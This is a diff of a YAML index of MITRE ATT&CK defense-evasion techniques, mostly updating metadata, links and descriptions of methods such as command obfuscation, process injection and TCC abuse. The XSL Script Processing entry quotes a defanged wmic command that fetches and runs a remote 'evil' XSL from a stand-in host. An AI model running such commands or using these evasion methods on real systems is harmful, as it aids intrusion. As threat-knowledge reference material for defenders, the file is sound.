+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12385,8 +12705,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12422,43 +12743,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12469,18 +12770,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12542,7 +12861,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12572,13 +12891,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12675,7 +12992,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12738,7 +13054,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12776,7 +13091,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12803,8 +13118,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12832,7 +13145,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12876,8 +13189,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12932,7 +13243,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12952,7 +13263,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -13002,7 +13312,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -13057,12 +13366,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13112,12 +13420,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13177,8 +13484,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13195,37 +13502,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13233,6 +13521,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13240,7 +13530,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13270,7 +13560,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13316,7 +13605,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13361,8 +13650,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13407,7 +13694,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13421,58 +13708,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13489,6 +13746,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13503,21 +13763,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13562,9 +13853,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13621,8 +13911,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13631,57 +13921,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13699,29 +13943,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
